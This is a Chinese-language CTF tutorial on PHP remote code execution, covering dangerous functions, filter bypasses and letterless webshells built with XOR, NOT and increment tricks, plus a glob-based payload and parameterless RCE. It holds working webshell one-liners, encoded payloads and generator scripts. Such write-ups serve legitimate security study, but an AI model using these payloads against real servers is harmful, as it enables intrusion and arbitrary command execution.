RCE漏洞介紹
RCE(Remote Code/Command Execute)遠程代碼/命令執行:是指用戶通過瀏覽器提交執行命令,由于服務器端沒有針對執行函式做過濾,導致在沒有指定絕對路徑的情況下就執行命令,可能會允許攻擊者通過改變 $PATH 或程式執行環境的其他方面來執行一個惡意構造的代碼,
漏洞產生原因:在Web應用中開發者為了靈活性,簡潔性等會讓應用呼叫代碼或者系統命令執行函式去處理,同時沒有考慮用戶的輸入是否可以被控制,造成代碼/系統命令執行漏洞
漏洞產生條件:可控變數,漏洞函式
常見場景:
-
使用了危險函式的Web應用
-
低版本的Java語言Struts框架
-
etc.
漏洞函式
重點就在命令執行函式或者代碼執行函式這里,PHP執行系統命令的有幾個常用的函式,如:system函式、exec函式、popen函式、passthru、shell_exec函式等,而PHP中常見的代碼執行命令則有像: eval() 、 assert() 、 preg_replace() 、${}等,區別就在于命令中傳入的引數值,是系統命令或是PHP代碼,
現在我們先來總結一下PHP中的這兩種函式:
PHP命令執行函式
-
system()
system — 執行外部程式(命令列),并且顯示輸出 這個函式會將結果直接進行輸出 (注意:是直接輸出區別于回傳值,因為這個,我一般不用它), 命令成功后回傳輸出的最后一行 ,失敗回傳FALSE,
-
shell_exec()
可以看到沒有被執行 shell_exec — 通過 shell 環境執行命令,并且將完整的輸出以字串的方式回傳 ,如果執行程序中發生錯誤或者行程不產生輸出,則回傳 NULL, 而且,php默認不給執行shell,要關掉安全模式,要在php.ini中注釋掉
disable_function:一行,
-
exec() 執行一個外部程式,回傳命令執行結果的最后一行內容, 不顯示回顯 ,如果想要獲取命令的輸出內容, 請確保使用 output 引數,或者利用這個函式來構建反彈shell,
-
passthru() passthru — 執行外部程式并且 顯示原始輸出 ,
一些奇怪一點的:
-
反引號
`命令`
反引號可以用來在PHP代碼中直接執行系統命令,但是想要回顯的話還是需要一個
echo,當然不止echo,其他外帶資訊輸出資訊的方式也可以,這里有個叫法叫行內執行大部分Unix shell以及編程語言如Perl、PHP以及Ruby等都以成對的反引號作指令替代,意思是以某一個指令的輸出結果作為另一個指令的輸入項,linux下反引號里面包含的就是需要執行的系統命令,而反引號里面的系統命令會先執行,成功執行后將結果傳遞給呼叫它的命令(就是將反引號內命令的輸出作為輸入執行),類似于|管道,這個就是行內執行,
-
花括號 花括號下要是執行沒有引數的命令也要有一個
,有引數的話直接在后面跟引數
-
echo echo在PHP中還是要結合反引號來進行命令執行,但是在linux中還可以進行變種的、在檔案里輸出的操作,相當于寫檔案操作,如果不經過嚴格過濾的話可以進行PHP一句話木馬的寫入,
-
命令拼接符 linux下:
command1 ; command2 : 先執行command1后執行comnand2 command1 & command2 : 先執行comnand2后執行command1 command1 && command2 : 先執行command1后執行comnand2 command1 | command2 : 只執行command2 command1 || command2 : command1執行失敗, 再執行command2(若command1執行成功,就不再執行command2) %0a(回車符)、%0d(換行符),這兩個也可以起到運行下一個命令的作用
windows下:
%0a、&、|、%1a(一個神奇的角色,作為.bat檔案中的命令分隔符)
PHP代碼執行函式
代碼執行漏洞和命令執行漏洞的區別不大,主要是輸入內容的區別,命令執行直接執行的就是系統命令,而代碼執行則是執行的PHP代碼,
-
eval() 不演示了,最常見的一句話木馬利用的不就是eval么?可以執行各種各樣的PHP函式,
-
assert()函式
assert ( mixed $assertion [, Throwable $exception ] )
assert函式在簡單的代碼執行中簡單的看就是直接將傳入的引數當成PHP代碼直接,不需要以分號結尾,當然加上也可以,
但是其實這里涉及到了assert作為斷言函式的一個漏洞,撰寫代碼時,我們總是會做出一些假設,斷言就是用于在代碼中捕捉這些假設,可以將斷言看作是例外處理的一種高級形式,程式員斷言在程式中的某個特定點該的運算式值為真(為真才能繼續執行),如果該運算式為假,就中斷操作, 漏洞:如果 assertion 是字串,它將會被 assert() 當做 PHP 代碼來執行,跟eval()類似,這是一種代碼執行,
-
preg_replace() preg_replace('正則規則','替換字符','目標字符') 將目標字符中符合正則規則的字符替換為替換字符,此時如果正則規則中使用/e修飾符,則存在代碼執行漏洞,
/e 修飾符使 preg_replace() 將 replacement 引數當作 PHP 代碼(在適當的逆向參考替換完之后),提示:要確保 replacement 構成一個合法的 PHP 代碼字串,否則 PHP 會在報告在包含 preg_replace() 的行中出現語法決議錯誤,
/e修飾符是 不推薦使用的正則運算式修飾符 ,它允許您在正則運算式中使用PHP代碼,這意味著您決議的任何內容都將被評估為您的程式的一部分,
-
create_function()函式 根據傳遞的引數創建匿名函式,并為其回傳唯一名稱,
create_function(string $args, string $code): string
通常,這些引數將作為單引號分隔的字串傳遞,使用單引號字串的原因是為了防止決議變數名,否則,如果使用雙引號,則需要轉義變數名,例如$avar, 分析一下就會是這樣的:
-
獲取引數, 函式體;
-
拼湊一個
function __lambda_func (引數) { 函式體;}的字串; -
eval; -
通過__lambda_func在函式表中找到eval后得到的函式體, 找不到就出錯;
-
定義一個函式名:”\000_lambda_” . count(anonymous_functions)++;
-
用新的函式名替換__lambda_func;
-
回傳新的函式,
這是PHP手冊上的第一個例子, 我們可以看到這里創造了一個名為lambda的function,這里叫46是因為我之前已經做過一些實驗了,我們把它構造器的函式體分析一下的話就是:
function lambda_46($a,$b){ return "ln($a) + ln($b) = " . log($a * $b); }其中M_E就是高中學的那個自然數,2.71828, 這里這個函式還是比較安全的,把引數都包進了函式內,但是如果使用不當,任意代碼執行漏洞就要誕生了,舉個例子:
/*注釋掉了后面所有的內容,}又與前面的函式構造完成了閉合,這樣,我們的phpinfo命令相當于就是在拼接下被eval執行了, 同樣creat_function()也能構造一句話木馬<?PHP $func=creat_function('',$_POST['cmd']);$func();?>從PHP7.2.0開始,該函式被廢棄,
-
-
array_map()函式 為陣列的每個元素應用回呼函式
或者,看個人對PHP代碼的理解了
也可以作為一句話木馬進行鏈接
http://localhost/123.php?func=assert 密碼:cmd
-
call_user_func() 也是一種回呼函式,把第一個引數當作回呼函式呼叫,和上面的array_map()利用方式一樣,
-
call_user_func_array() 呼叫回呼函式,并把一個陣列引數作為回呼函式的引數.
-
array_filter() 使用回呼函式過濾陣列的元素
-
uasort() 使用用戶自定義的比較函式對陣列中的值進行排序并保持索引關聯,已棄用,
-
${}執行代碼 在PHP語言中,單引號和雙引號都可以表示一個字串,但是 對于雙引號來說,可能會對引號內的內容進行二次解釋 ,這就可能會出現安全問題, 舉個簡單的例子:<?php $a = 1; $b = 2; echo '$a$b';//輸出結果為$a$b echo "$a$b";//輸出結果為12 ?>
同樣在 "雙引號" 中倘若有
${}出現 ,那么{}內的內容將被當做php代碼塊來執行,
代碼后面不加
;
繞過!
常見繞過
這里是一些常見的繞過方式,不只是在RCE當中,大部分的漏洞里的繞過其實是換湯不換藥的,RCE這里有些不同的地方就在于,因為是要命令執行,它還牽扯到了很多命令列中的方法來進行繞過,
str_replace()
常見的類似于str_replace('flag','')的過濾我們可以使用雙寫繞過,flflagag把中間的flag替換為空之后還是flag,
過濾空格
一些命令,像cat /flag是一定要用到空格的,如果沒法輸入空格就會導致我們沒法執行命令,
< 、<>、%09(tab)、%20、$IFS$9、$IFS$1、${IFS}、$IFS等,還可以用{} 比如 {cat,flag}
$9是當前系統shell行程的第九個引數的持有者,它始終為空字串,
還有一些編碼繞過或者編碼后在{}中的也可以通過{,}繞過空格
敏感字符繞過
利用編碼繞過敏感字符
URL編碼繞過
關于$_SERVER['QUERY_STRING'],它驗證的時候是不會進行url解碼的,但是在GET的時候則會進行url解碼,所以我們只需要將關鍵詞進行url編碼就能繞過,
這里涉及到這個$_SERVER['QUERY_STRING'],屬于PHP中$_SERVER這個全域變數的一種,
BASE64編碼繞過
linux下base64命令用法:
base64 [選項]… [檔案] 使用 Base64 編碼/解碼檔案或標準輸入/輸出, -d, --decode 解碼資料 -w, --wrap=字符數 在指定的字符數后自動換行(默認為76),0 為禁用自動換行
利用時要結合管道符
第一個流行的shell是由Steven Bourne 發展出來的,為了紀念它就稱為Bourne shell,或直接簡稱為sh
而Linux使用的版本為Bourne Again SHell 簡稱為 bash ,這個shell是Bourne shell 的 增強版本 ,
Hex編碼繞過
道理其實與上面base相同
利用linux xxd命令,xxd 命令可以將指定檔案或標準輸入以十六進制轉儲,也可以把十六進制轉儲轉換成原來的二進制形式,
-r引數:逆向轉換,將16進制字串表示轉為實際的數,
-p這里就表示列印,顯示出來,但是不-p的話就沒有辦法執行命令
也可以用 $() 的形式直接行內執行:
關于行內執行這個概念在上面的反引號處有講,這里我們可以通過行內執行printf函式來解碼hex編碼
Oct編碼繞過
和上面這種hex類似,也是利用的printf和行內執行
拼接繞過
偶讀拼接繞過
也不太明白“偶讀”到底是個什么術語,差不多就是把一個引數定義成好幾個引數,然后一塊使用就相當于繞過了的意思吧,
a=l;b=s;$a$b a=fl;b=ag;cat $a$b
利用.拼接來進行繞過
(sy.(st).em)
其實不太知道這個能用在哪里
用引號繞過
我們可以用引號繞過對關鍵字的過濾
ca""t => cat mo""re => more in""dex => index ph""p => php
用通配符繞過
可以看到,題目使用 preg_match("/.*f.*l.*a.*g.*/", $ip) 過濾了flag,那么我們讀取flag時就可以用以下方法繞過:
假設flag在/flag中: /?url=127.0.0.1|ca""t%09/fla? /?url=127.0.0.1|ca""t%09/fla* 假設flag在/flag.txt中: /?url=127.0.0.1|ca""t%09/fla???? /?url=127.0.0.1|ca""t%09/fla* 假設flag在/flags/flag.txt中: /?url=127.0.0.1|ca""t%09/fla??/fla???? /?url=127.0.0.1|ca""t%09/fla*/fla*
下面說一下原理:
在正則運算式中,?這樣的通配符與其它字符一起組合成運算式,匹配前面的字符或運算式零次或一次, 在shell命令列中,? 這樣的通配符與其它字符一起組合成運算式,匹配任意一個字符, 同理,我們可以知道* 通配符:
在正則運算式中,*這樣的通配符與其它字符一起組合成運算式,匹配前面的字符或運算式零次或多次, 在shell命令列中,*這樣的通配符與其它字符一起組合成運算式,匹配任意長度的字串,這個字串的長度可以是0,可以是1,可以是任意數字,
當然通配符不止如此,P牛的文章里有嶄新的利用通配符的方式,下面會講,
用反斜杠繞過
反斜杠\(區分路徑/,linux下,windows下路徑就是用的反斜杠)在正則等語法里面,表示后面跟的字符是正常字符,不需要轉義,
也就意味著,我們可以在rce漏洞,過濾掉cat、ls等命令時,使用ca\t來實作繞過
用[]匹配繞過關鍵字過濾
c[a]t => cat mo[r]e => more in[d]ex => index p[h]p => php
無回顯RCE
沒有回顯加上命令執行的話很容易就能想到反彈shell,命令本來就該在命令列里嘛,
具體的反彈shell應該去和whoami取一下經:https://xz.aliyun.com/t/9488
無數字字母webshell
經典的過濾代碼
<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
eval($_GET['shell']);
}
小知識點
PHP短標簽
我們知道<?PHP ?>是PHP的標簽,里面的內容會被當作PHP代碼的內容,但是由于含有PHP,我們過濾所有數字字母的時候同樣會過濾掉它,
此時我們就要使用我們的PHP短標簽了,并且在短標簽中的代碼不需要使用分號,
<? ?> //相當于<?PHP ?> <?= ?> //相當于<?PHP echo ... ?>
例證上面的<?= ?>
PHP5和PHP7的區別
-
在 PHP 5 中,
assert()是一個函式,我們可以用$_=assert;$_()這樣的形式來實作代碼的動態執行,但是在 PHP 7 中,assert()變成了一個和eval()一樣的語言結構,不再支持上面那種呼叫方法,(但是好像在 PHP 7.0.12 下還能這樣呼叫) -
PHP5中,是不支持
($a)()這種呼叫方法的,但在 PHP 7 中支持這種呼叫方法,因此支持這么寫('phpinfo')();,
異或
這里就是P牛的第一種方法,
在PHP中,兩個字串執行異或操作以后,得到的還是一個字串,所以,我們想得到a-z中某個字母,就找到某兩個非字母、數字的字符,他們的異或結果是這個字母即可,
得到如下的結果(因為其中存在很多不可列印字符,所以我用url編碼表示了):
<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);
/*這里的整個拼接流程還是比較簡單的*/
下面是忘記了從哪里扒的一個可以列印出來各種字符異或的腳本
<?php
$myfile=fopen("xor_rce.txt","w");
$contents="";
for($i=0;$i<256;$i++){
for($j=0;$j<256;$j++){
if($i<16){
$hex_i='0'.dechex($i);
}
else{
$hex_i=dechex($i);
}
if($j<16){
$hex_j='0'.dechex($j);
}
else{
$hex_j=dechex($j);
}
$preg='/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i'; // 根據題目給的正則運算式修改即可
if(preg_match($preg,hex2bin($hex_i))||preg_match($preg,hex2bin($hex_j))){
echo "";
}
else{
$a='%'.$hex_i;
$b='%'.$hex_j;
$c=(urldecode($a)^urldecode($b));
// 此處范圍是將按位或運算得到的字符限定在可見字符范圍內
if(ord($c)>=32&ord($c)<=126){
$contents=$contents.$c." ".$a." ".$b."\n";
}
}
}
}
fwrite($myfile,$contents);
fclose($myfile);
?>
根據這個腳本列印一下參與異或的兩個引數和異或出來的字符,然后根據我們的需求去進行查找就可以了,注意一下格式,別漏;之類的必備符號,這里還有一個配套的python的腳本,用來查找我們的需求字符,
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import urllib
from sys import *
import os
def action(arg):
s1=""
s2=""
for i in arg:
f=open("xor_rce.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
# print(i)
s1+=t[2:5]
s2+=t[6:9]
break
f.close()
output="(\""+s1+"\"^\""+s2+"\")"
return(output)
while True:
param=action(input("\n[+] your function: "))+action(input("[+] your command: "))+";"
print('\n',param)
取反
這里是P牛的方法二,和方法一有異曲同工之妙,唯一差異就是,方法一使用的是位運算里的“異或”,方法二使用的是位運算里的“取反”,
方法二利用的是UTF-8編碼的某個漢字,并將其中某個字符取出來,比如'和'{2}的結果是"\x8c",其取反即為字母s:
echo ~('瞰'{1}); // a
echo ~('和'{2}); // s
echo ~('和'{2}); // s
echo ~('的'{1}); // e
echo ~('半'{1}); // r
echo ~('始'{2}); // t
隨機選擇了一些漢字之后得到了如下的姿勢
$__=('>'>'<')+('>'>'<'); // $__=2, 利用PHP的弱型別的特點獲取數字
$_=$__/$__; // $_=1
$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__}); // $____=assert
$_____=_;$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_}); // $_____=_POST
$_=$$_____; // $_=$_POST
$____($_[$__]); // assert($_POST[2])
太強了,屬實是把PHP玩明白了,
URL 編碼取反繞過
剛才我們介紹的是通過取反漢字來得到我們想要的字母,我們還可以直接對一串惡意代碼進行取反然后 URL 編碼,在發送 Payload 的時候再次將其取反便可將代碼還原,然后將其動態執行,并且,因為是取反,基本上用的都是不可見字符,所以不會觸發到正則運算式,
假設我們要構造一個phpinfo();,由于因為沒有過濾括號,所以只需要先取反再編碼字串 "phpinfo" 就行了:
echo urlencode(~'phpinfo');
然后再補上括號等就可以代碼執行了,phpinfo()是沒有引數的,如果需要執行有引數的函式的話,比如system('ls /');,則應分別對其中的字符進行編碼:
(~%8F%97%8F%96%91%99%90)(); // phpinfo(); (~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0); //system(ls /);
抄whoami神一個腳本
<?php
//在命令列中運行
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
或
P牛師傅沒玩這個,他位運算玩膩了,這個其實和勤勉的異或和取反一樣,都是基于PHP再位運算中的特性形成的特點,
<?php
$myfile = fopen("or_rce.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) {
for ($j=0; $j <256 ; $j++) {
if($i<16){
$hex_i='0'.dechex($i);
}else{
$hex_i=dechex($i);
}
if($j<16){
$hex_j='0'.dechex($j);
}else{
$hex_j=dechex($j);
}
$preg = '/[0-9a-z]/i'; //根據題目給的正則運算式修改即可
if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
echo "";
}else{
$a='%'.$hex_i;
$b='%'.$hex_j;
$c=(urldecode($a)|urldecode($b));
if (ord($c)>=32&ord($c)<=126) {
$contents=$contents.$c." ".$a." ".$b."\n";
}
}
}
}
fwrite($myfile,$contents);
fclose($myfile);
然后和異或一樣寫腳本查找
def action(arg):
s1=""
s2=""
for i in arg:
f=open("or_rce.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
# print(i)
s1+=t[2:5]
s2+=t[6:9]
break
f.close()
output="(\""+s1+"\"|\""+s2+"\")"
return(output)
while True:
param=action(input("\n[+] your function: "))+action(input("[+] your command: "))
print('\n',param)
自增繞過
首先看檔案,PHP中的自增有一個小特性,
也就是說,'a'++ => 'b','b'++ => 'c'... 所以,我們只要能拿到一個變數,其值為a,通過自增操作即可獲得a-z中所有字符,
那么,如何拿到一個值為字串'a'的變數呢?
巧了,陣列(Array)的第一個字母就是大寫A,而且第4個字母是小寫a,也就是說,我們可以同時拿到小寫和大寫A,等于我們就可以拿到a-z和A-Z的所有字母,
在PHP中,如果強制連接陣列和字串的話,陣列將被轉換成字串,其值為Array:
再取這個字串的第一個字母,就可以獲得'A'了,
利用這個技巧,我撰寫了如下webshell(因為PHP函式是大小寫不敏感的,所以我們最終執行的是ASSERT($_POST[_]),無需獲取小寫a):
<?php $_=[]; $_=@"$_"; // $_='Array'; $_=$_['!'=='@']; // $_=$_[0]; $___=$_; // A $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; $___.=$__; // S $___.=$__; // S $__=$_; $__++;$__++;$__++;$__++; // E $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R $___.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $___.=$__; $____='_'; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S $____.=$__; $__=$_; $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T $____.=$__; $_=$$____; $___($_[_]); // ASSERT($_POST[_]);
縮減后即,使用時需要進行一次URL編碼,shell為_
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
無數字字母webshell之字符被過濾
_ 被過濾
在前文中我們可以看到,很多 Payload 的構造都用到了下劃線_作為變數名,但即便是下劃線_被過濾了,我們也根本無需擔心,因為我們本就可以不用_,
-
比如我們前面的像下面那幾種 Payload 就沒有用到
_:
("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%0c%08%00%00"^"%60%7b%20%2f");//xor
("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%0c%13%00%00"|"%60%60%20%2f");//or
(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);//URL取反
-
再來看看另一個師傅用過這樣的 Payload,也可以繞過,而且效果極好:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
解釋一下這個師傅的繞過手法:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
即:
${_GET}{%ff}();&%ff=phpinfo//?shell=${_GET}{%ff}();&%ff=phpinfo
先解釋一下這里的%ff:
任何字符與 0xff 異或都會取相反,這樣就能減少運算量了, 注意:測驗中發現,傳值時對于要計算的部分不能用括號括起來,因為括號也將被識別為傳入的字串,可以使用
{}代替,原因是 PHP 的 use of undefined constant 特性,例如${_GET}{a}這樣的陳述句 PHP 是不會判為錯誤的,因為{}是用來界定變數的,這句話就是會將_GET自動看為字串,也就是$_GET['a'],${_GET}{%ff}后面那個()為的是能夠動態執行傳入的 PHP 函式,
如果想要執行帶引數的函式比如system('whoami'),那我們可以對后面括號里的引數做相同的編碼處理:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}(%ff%ff%ff%ff%ff%ff^%88%97%90%9E%92%96);&%ff=system
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}(%ff%ff%ff%ff%ff%ff%ff%ff^%99%93%9E%98%D1%8F%97%8F);&%ff=readfile
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}(%ff%ff%ff%ff%ff%ff%ff%ff^%99%93%9E%98%D1%8F%97%8F);&%ff=highlight_file
// 即:
// ${_GET}{%ff}('whoami');&%ff=system
// ${_GET}{%ff}('flag.php');&%ff=readfile
// ${_GET}{%ff}('flag.php');&%ff=highlight_file
同理,我們也可以直接進行取反:
${~%A0%B8%BA%AB}{%ff}();&%ff=phpinfo
${~%A0%B8%BA%AB}{%ff}(~%88%97%90%9E%92%96);&%ff=system
此外,繼承于上述原理,我們還可以直接使用反引號執行命令:
?><?=`{${~%A0%B8%BA%AB}{%ff}}`?>&%ff=ls /
分析下這個 Payload:
?><?=`{${~%A0%B8%BA%AB}{%ff}}`?>&%ff=ls /
即:
?><?PHP echo `$_GET[%ff]`?>&%ff=ls /
最開頭的?>閉合了 eval() 函式自帶的<?標簽,接下來使用了短標簽代替<?php echo ... ?>,{}里面包含的 PHP 代碼可以被執行,~%A0%B8%BA%AB為_GET,最后將通過引數%ff傳入的值使用反引號進行命令執行,
;被過濾
這個就很無所謂了,短標簽是不需要分號的,
$ 被過濾
P牛的另一篇文章:
在 PHP 7 中修改了運算式執行的順序:
PHP7前是不允許用($a)();這樣的方法來執行動態函式的,但PHP7中增加了對此的支持,所以,我們可以通過('phpinfo')();來執行函式,第一個括號中可以是任意PHP運算式,
所以很簡單了,構造一個可以生成phpinfo這個字串的PHP運算式即可,payload如下(不可見字符用url編碼表示):
(~%8F%97%8F%96%91%99%90)();
也就是剛剛的取反,以及其他位運算
PHP5
大部分語言都不會是單純的邏輯語言,一門全功能的語言必然需要和作業系統進行互動,作業系統里包含的最重要的兩個功能就是“shell(系統命令)”和“檔案系統”,很多木馬與遠控其實也只實作了這兩個功能,
PHP自然也能夠和作業系統進行互動,“反引號”就是PHP中最簡單的執行shell的方法,那么,在使用PHP無法解決問題的情況下,為何不考慮用“反引號”+“shell”的方式來getshell呢?
因為反引號不屬于“字母”、“數字”,所以我們可以執行系統命令,但問題來了:如何利用無字母、數字、$的系統命令來getshell?
此時我想到了兩個有趣的Linux shell知識點:
-
shell下可以利用
.來執行任意腳本 -
Linux檔案名支持用glob通配符代替
. file的意思就是用bash執行file檔案中的命令,是不需要file有x權限的,
那么,如果目標服務器上有一個我們可控的檔案,那不就可以利用.來執行它了嗎?
這個檔案也很好得到,我們可以發送一個上傳檔案的POST包,此時PHP會將我們上傳的檔案保存在臨時檔案夾下,默認的檔案名是/tmp/phpXXXXXX,檔案名最后6個字符是隨機的大小寫字母,
第二個難題接踵而至,執行. /tmp/phpXXXXXX,也是有字母的,此時就可以用到Linux下的glob通配符:
-
*可以代替0個及以上任意字符 -
?可以代表1個任意字符
那么,/tmp/phpXXXXXX就可以表示為/*/?????????或/???/?????????,但是要知道這樣的檔案有很多,我們怎么樣才能選到我們上傳的那個檔案呢,
大部分同學對于通配符,可能知道的都只有*和?,但實際上,閱讀Linux的檔案( glob(7) - Linux manual page ),可以學到更多有趣的知識點,
其中,glob支持用[^x]的方法來構造“這個位置不是字符x”,那么,我們用這個姿勢干掉/bin/run-parts,以及帶.的兩個,
/???/???[^-][^.][^.]?[^.]?
現在就剩最后三個檔案了,但我們要執行的檔案仍然排在最后,但我發現這三個檔案名中都不包含特殊字符,那么這個方法似乎行不通了
繼續研究通配符,跟正則運算式類似,glob支持利用[0-9]來表示一個范圍,
所有檔案名都是小寫,只有PHP生成的臨時檔案包含大寫字母,那么答案就呼之欲出了,我們只要找到一個可以表示“大寫字母”的glob通配符,就能精準找到我們要執行的檔案,
翻開ascii碼表,可見大寫字母位于@與[之間,那么,我們可以利用[@-[]來表示大寫字母:
上面的幾種過濾也不需要了,我們只有這一個檔案是最后以大寫字母結尾的,臨時檔案的生成是隨機的,多試幾次就可以得到最后一個字母是大寫的檔案了,
/???/????????[@-[]
綜合一下,我們的payload就職這樣的
?><?= `. /???/????????[@-[]`?>
上傳表單我們可以通過抓包后進行修改得到,payload
POST /?shell=?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f[%3f-[]`%3b?> HTTP/1.1 Host: xxx.xxx.xxx.xxx:xxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type:multipart/form-data;boundary=--------123 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 109 ----------123 Content-Disposition:form-data;name="file";filename="1.txt" #!/bin/sh ls / ----------123--
無引數RCE
這里有道例題,就是[GXYCTF2019]禁止套娃
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
}
preg_replace('/[a-z]+\((?R)?\)/', NULL, $code)
pre_match('/et|na|nt|strlen|info|path||rand|dec|bin|hex|oct|pi|exp|log/i', $code))
對兩個正則進行一下分析:
-
preg_replace 的主要功能就是限制我們傳輸進來的必須是純小寫字母的函式,而且不能攜帶引數, 再來看一下:(?R)?,這個意思為遞回整個匹配模式,所以正則的含義就是匹配無引數的函式,內部可以無限嵌套相同的模式(無引數函式)
-
preg_match 的主要功能就是過濾函式,把一些常用不帶引數的函式關鍵部分都給過濾了,需要去構造別的方法去執行命令,
說白了就是傳入的引數不能含有引數
scandir('a()')//可以使用,里面沒有引數 scandir('123')//不可以使用,里面有引數
那么這個時候,我們要怎么樣進行繞過呢?
利用session_id
利用http headers傳參,然而http中有那么多的內容,最容易想到的估計就是cookies傳遞引數, 在php中有一個函式session_id可以用來獲取/設定當前會話ID,并且這個值是我們可控的,但是它的使用有些限制: 檔案會話管理器僅允許會話 ID 中使用以下字符:a-z A-Z 0-9 ,(逗號)和 - 減號 ,但是這并不影響我們操作,我們可以使用十六進制傳入,之后使用hex2bin()函式轉換即可,但是使用session_id的時候必須要開啟session才可以,需要session_start
?code=eval(hex2bin(session_id(session_start())));
算一下十六進制,hex("phpinfo();")=706870696e666f28293b,然后在cookie中傳入PHPSESSID
利用get_defined_vars ()函式
get_defined_vars():回傳由所有已定義變數所組成的陣列
我們通過get或者post方法,傳入的引數,以及它的值可以被get_defined_vars()讀出來,而且它回傳的還是陣列,那么我們可以通過php中的一系列對陣列操作的函式來得到我們想要的值,
end() - 將內部指標指向陣列中的最后一個元素,并輸出, next() - 將內部指標指向陣列中的下一個元素,并輸出, prev() - 將內部指標指向陣列中的上一個元素,并輸出, reset() - 將內部指標指向陣列中的第一個元素,并輸出, each() - 回傳當前元素的鍵名和鍵值,并將內部指標向前移動, current() -輸出陣列中的當前元素的值,
構造payload
?code=print_r(current(get_defined_vars()));&b=phpinfo();
查看最后一個陣列,且eval
?code=eval(end(current(get_defined_vars())));&b=phpinfo();
利用getallheaders()
getallheaders回傳當前請求的所有請求頭資訊,那么我們可以把需要執行的引數寫進請求頭里,隨意一個引數都可以,之后就可用陣列操作的函式拿出來寫入的引數并且執行,
像這樣
細心的朋友肯定會發現,這里有兩個eval函式,這里需要兩個eval的原因,我認為是,如果只有一個eval就只是執行 end(getallheaders()); 獲取了其回傳值,但是并沒有執行其回傳值,再加一個eval ,也就是獲取了回傳值后,再eval(),
getenv()
getenv():獲取環境變數的值(在PHP7.1之后可以不給予引數)
getenv() 獲取一個環境變數的值,phpinfo() 獲取全部的環境變數,其實不是很理解,直接phpinfo()就好了,
